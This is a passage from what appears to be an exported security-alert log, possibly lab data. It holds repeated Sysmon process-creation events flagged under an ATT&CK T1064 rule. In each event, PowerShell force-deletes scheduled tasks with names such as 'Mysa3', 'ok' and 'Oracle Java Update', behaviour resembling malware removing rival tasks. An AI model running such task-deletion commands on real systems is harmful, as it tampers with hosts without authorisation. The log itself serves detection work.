Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.474",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.221 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001083d32600} +ProcessId: 6284 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.234943900Z"",""eventRecordID"":""3041"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.221\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001083d32600}\r\nProcessId: 6284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.221"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001083d32600}"",""processId"":""6284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.461",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.160 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010f4d02600} +ProcessId: 1680 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.180542600Z"",""eventRecordID"":""3040"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.160\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010f4d02600}\r\nProcessId: 1680\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.160"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010f4d02600}"",""processId"":""1680"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.100 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001061ce2600} +ProcessId: 8072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.109326100Z"",""eventRecordID"":""3039"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.100\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001061ce2600}\r\nProcessId: 8072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.100"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001061ce2600}"",""processId"":""8072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.383",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.069 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001079cc2600} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.071667200Z"",""eventRecordID"":""3038"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.069\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001079cc2600}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.069"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001079cc2600}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.345",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.036 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010d1ca2600} +ProcessId: 1996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.039233200Z"",""eventRecordID"":""3037"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.036\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010d1ca2600}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.036"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010d1ca2600}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.325",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.001 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010c4c82600} +ProcessId: 6724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.004539200Z"",""eventRecordID"":""3036"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.001\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010c4c82600}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.001"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010c4c82600}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 